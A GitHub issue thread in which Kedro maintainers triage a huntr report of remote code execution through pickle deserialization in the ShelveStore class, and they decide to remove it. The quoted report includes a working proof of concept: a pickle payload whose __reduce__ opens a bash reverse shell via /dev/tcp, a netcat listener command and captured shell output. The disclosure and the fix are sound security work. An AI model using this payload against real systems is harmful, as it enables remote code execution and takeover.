Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Investigate "Potential security issue" in ShelveStore #4137

Closed
merelcht opened this issue Sep 2, 2024 · 10 comments · Fixed by #4148
Closed

Investigate "Potential security issue" in ShelveStore #4137

merelcht opened this issue Sep 2, 2024 · 10 comments · Fixed by #4148
Assignees

Comments

@merelcht
Copy link
Member

merelcht commented Sep 2, 2024

Description

Investigate whether the "potential security issue" flagged in ShelveStore is something we need to address.

Context

The team received the following message:

Hi kedro-org,

A security researcher from huntr has reported a potential vulnerability in kedro.

Here's the report:

Submission date

2024-09-01T06:34:51.574Z

Title

Remote Code Execution (RCE) via Malicious Shelve File Upload in Kedro's ShelveStore

Severity

CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H = High (8.4)

Vulnerability Type

Deserialization of Untrusted Data

Description

Summary

A Remote Code Execution (RCE) vulnerability has been identified in the Kedro ShelveStore class. This vulnerability allows an attacker to execute arbitrary Python code via deserialization of malicious payloads, potentially leading to a full system compromise.

Vulnerability Details

Type: Remote Code Execution (RCE)

Class Affected: ShelveStore from kedro.framework.session.shelvestore

Version: 0.19.8

Description

The ShelveStore class uses Python's shelve module to manage session data. The shelve module relies on pickle for serialization, which can be exploited to execute arbitrary code. Crafting a malicious payload and storing it in the shelve file can lead to RCE when the payload is deserialized.

Prerequisites

Install the required Python package:

pip install kedro

Steps to Reproduce

Create Malicious Payload:

import os
import shelve
import pickle

# Define the malicious payload class
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'",))

path = "/home/cyfra/Bugbounty/huntr/kedro/test/shelve_data.db"

#malicious_data = pickle.dumps(MaliciousPayload())

# Save the malicious payload
print("Saving malicious payload...")
with shelve.open(path, writeback=True) as shelve_db:
    shelve_db['malicious'] = MaliciousPayload()

print("Malicious payload saved.")

Trigger the Vulnerability:

from kedro.framework.session.shelvestore import ShelveStore

# Define the path where the shelve file is stored
path = "/home/cyfra/Bugbounty/huntr/kedro/test/shelve_data.db"
# Define a unique session ID
session_id = "1234"  # Random session ID

# Initialize ShelveStore with the path and session ID
ShelveStore(path=path, session_id=session_id)

# Verify the exploit
print("Reverse shell executed successfully...")

Start a Listener:

nc -lvnp 4444

Observe that the server initiates a connection back to your machine, providing a reverse shell.

Verification:

┌──(cyfra㉿kali)-[~/Bugbounty/huntr/kedro]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37648
┌──(venv)(cyfra㉿kali)-[~/Bugbounty/huntr/kedro/test]
└─$ whoami
whoami
cyfra

┌──(venv)(cyfra㉿kali)-[~/Bugbounty/huntr/kedro/test]
└─$ exit
exit
exit
                                                                                                                                                          
┌──(cyfra㉿kali)-[~/Bugbounty/huntr/kedro]
└─$ 

Impact

The Remote Code Execution (RCE) vulnerability in Kedro's ShelveStore allows an attacker to execute arbitrary Python code by exploiting deserialization of a malicious payload. This can lead to severe consequences, including:

Full System Compromise:

  • An attacker can gain control over the server by executing arbitrary commands, potentially leading to full system compromise.

Data Breach:

  • The attacker could access, modify, or exfiltrate sensitive data stored on the server.

Occurrence(s) in code

class ShelveStore(BaseSessionStore):

Magic link (no sign-up) URL

https://huntr.com/bounties/96c77fef-93b2-4d4d-8cbe-57a718d8eea5/?token=cc8fefd0e45dda9df6128169a4877b80506802b80e4e037d7f76292aaa4cbb5523308d2ba446b5ccbae1951bc406d81dd7c7e3383deafcf3b6451bf54d2f1aec621722c5bb976cb82e211a9088eb6ed6d5cbf8708322e6c0b76af69bde84a483abe229293d5a5015168f5952c508e0a1b62b2407c1947fcb03affff0c0e07cfb2804177ee10dca3331356e32735c4d6b0d9748dd0f87655880084cb8f6624defb38697bf71428b84e3f3d497d68509b975b4f39223aa6af3150657a78ed9ab8e95a846924c1dbf65f0f5

This report is set to be automatically published on 2024-11-30T06:34:51.536Z UTC. We will remind you as the date gets closer.

You can delay the disclosure timeline, discuss with the researcher, request a fix and plenty more by following the magic link above.

If you have any questions, please get in touch!

  • the huntr team
@merelcht merelcht converted this from a draft issue Sep 2, 2024
@merelcht merelcht moved this to To Do in Kedro Framework Sep 2, 2024
@merelcht merelcht assigned lrcouto and ankatiyar and unassigned lrcouto Sep 2, 2024
@ankatiyar
Copy link
Contributor

ankatiyar commented Sep 3, 2024

It seems like there is a genuine vulnerability with the shelve library for reading unverified files because shelve relies on pickle: https://docs.python.org/3/library/shelve.html#shelve-security

The ShelveStore in Kedro has both save() and read() methods. The read() method is called during a run when the store is initialised -

return store_class(**store_args) # type: ignore[no-any-return]

def __init__(self, path: str, session_id: str):
self._path = path
self._session_id = session_id
super().__init__(self.read())

One of the alternatives to shelve is json. One solution could be to implement a JSONstore and remove ShelveStore. .json is a more transparent file type. As a quick (eta: partial) solution, we could also add some path validation but we would then have to decide on some restrictions to put on the session store path. This path value can usually be set through settings.py and SESSION_STORE_ARGS by the user.

However, going through the Kedro docs, I didn't see any mention of the ShelveStore or any instructions on how to use it. If this feature is not used at all, we could consider deprecating and removing it without any alternatives.

Would love the team's thoughts on the way forward. @merelcht @astrojuanlu @lrcouto @ElenaKhaustova @noklam @DimedS

@astrojuanlu
Copy link
Member

My reading of the situation is that pickle, hence shelve, is always insecure with untrusted data. And I'm not sure validating the path really helps.

I know removing the class in the next micro version would technically be a backwards-incompatible change, but (1) it's insecure, so people shouldn't be using it anyway, and (2) it's not documented anywhere. So I'm voting for removal.

@merelcht
Copy link
Member Author

merelcht commented Sep 4, 2024

I'm also in favour of removing ShelveStore, but I would do it the proper way and deprecate it in the 0.19 series and fully remove in the next breaking release. This is a good lesson for us that while it's easy and non-breaking to add things to the public API, removal always comes at the price of a breaking release. So don't just add things because it's easy.

@astrojuanlu
Copy link
Member

My only question is, will that mean that we'll have a public, unaddressed security issue in the codebase from 2024-11-30 (the date the report will be published) until we release 0.20? I know technically it would have no effect provided that the user doesn't use ShelveStore, but I'm wondering if it will raise some eyebrows...

@merelcht
Copy link
Member Author

merelcht commented Sep 4, 2024

Technically we have had that issue since it was introduced in 2020.. Since it's a component that isn't widely used, we could do a TSC vote to agree on early removal in a non-breaking change?

@DimedS
Copy link
Contributor

DimedS commented Sep 4, 2024

Technically we have had that issue since it was introduced in 2020.. Since it's a component that isn't widely used, we could do a TSC vote to agree on early removal in a non-breaking change?

I agree with the proposal, especially given the security concerns.

@astrojuanlu
Copy link
Member

I managed to access the original report on Huntr, updated the description of the issue accordingly (since formatting was lost).

There's an ongoing conversation, as well as actions we can take.

image

For now, I acknowledged the report and added a cross reference to this thread.

@ankatiyar ankatiyar mentioned this issue Sep 6, 2024
7 tasks
@github-project-automation github-project-automation bot moved this from In Review to Done in Kedro Framework Sep 9, 2024
@astrojuanlu
Copy link
Member

Are there any next steps here? Was the CVSS score properly calculated? Should a CVE be assigned? @merelcht

image

@merelcht
Copy link
Member Author

merelcht commented Oct 8, 2024

We resolved the issue by removing the offending class. I don't know how far we need to go in interacting with these websites though.. This is not a tool we've officially selected for security scanning. I have no idea what "the rules" are here. Snyk was an officially chosen tool, so we always had to act on it. I'm not sure it's feasible to respond to every AI tool popping up.

@ethansilvas
Copy link

ethansilvas commented Oct 9, 2024

Hi @merelcht I've gone ahead and validated this on our end since it's been fixed but I'm currently unable to assign your account to receive the fix bounty. Please let me know if you intend to setup the account to receive fix bounties or if there are any issues. We can also just drop the fix bounties if it may be a problem.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
Status: Done
Development

Successfully merging a pull request may close this issue.

6 participants